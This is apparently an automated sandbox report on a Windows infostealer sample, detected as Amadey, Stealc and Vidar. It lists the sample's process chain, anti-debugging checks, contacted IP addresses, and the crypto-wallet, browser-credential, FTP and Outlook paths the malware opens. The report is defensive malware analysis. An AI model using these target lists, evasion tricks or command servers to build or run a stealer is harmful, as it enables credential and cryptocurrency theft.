Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C5BB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C5BB1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C76AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Program Manager
Source: explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: >Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB341 cpuid 0_2_6C5BB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\ee7a49fbf0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\ee7a49fbf0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 14.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000003.2270021811.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2298982313.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2307792347.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2298393028.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2263477354.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3273644345.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2269241540.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2655374647.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2339495217.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2338863000.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2309993575.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280286776.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2310315083.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2654668083.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2237950583.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2283696962.0000000000751000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770C40 sqlite3_bind_zeroblob, 0_2_6C770C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770D60 sqlite3_bind_parameter_name, 0_2_6C770D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C698EA0 sqlite3_clear_bindings, 0_2_6C698EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483195 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 129 www.youtube.com 2->129 131 www.wikipedia.org 2->131 133 63 other IPs or domains 2->133 147 Found malware configuration 2->147 149 Malicious sample detected (through community Yara rule) 2->149 151 Antivirus detection for URL or domain 2->151 153 13 other signatures 2->153 10 file.exe 39 2->10         started        15 explorti.exe 2->15         started        17 explorti.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 135 85.28.47.31, 49704, 80 GES-ASRU Russian Federation 10->135 137 185.215.113.16, 49705, 80 WHOLESALECONNECTIONSNL Portugal 10->137 95 C:\Users\user\AppData\RoamingIJDGCAEBFI.exe, PE32 10->95 dropped 97 C:\Users\user\AppData\RoamingCBFCFBFBFB.exe, PE32 10->97 dropped 99 C:\Users\user\AppData\...\softokn3[1].dll, PE32 10->99 dropped 111 15 other files (11 malicious) 10->111 dropped 167 Detected unpacking (changes PE section rights) 10->167 169 Detected unpacking (overwrites its own PE header) 10->169 171 Tries to steal Mail credentials (via file / registry access) 10->171 183 6 other signatures 10->183 21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        25 WerFault.exe 19 16 10->25         started        139 185.215.113.19 WHOLESALECONNECTIONSNL Portugal 15->139 101 C:\Users\user\AppData\...\48f0ec6733.exe, PE32 15->101 dropped 103 C:\Users\user\AppData\Local\...\random[1].exe, PE32 15->103 dropped 105 C:\Users\user\AppData\Local\...\random[1].exe, PE32 15->105 dropped 107 C:\Users\user\1000003002\ee7a49fbf0.exe, PE32 15->107 dropped 173 Creates multiple autostart registry keys 15->173 175 Hides threads from debuggers 15->175 177 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->177 28 ee7a49fbf0.exe 15->28         started        31 48f0ec6733.exe 15->31         started        179 Tries to evade debugger and weak emulator (self modifying code) 17->179 181 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->181 109 C:\Users\user\AppData\Local\...\History, SQLite 19->109 dropped 33 firefox.exe 19->33         started        36 msedge.exe 19->36         started        38 msedge.exe 19->38         started        40 3 other processes 19->40 file6 signatures7 process8 dnsIp9 42 RoamingCBFCFBFBFB.exe 4 21->42         started        46 conhost.exe 21->46         started        48 RoamingIJDGCAEBFI.exe 4 23->48         started        50 conhost.exe 23->50         started        79 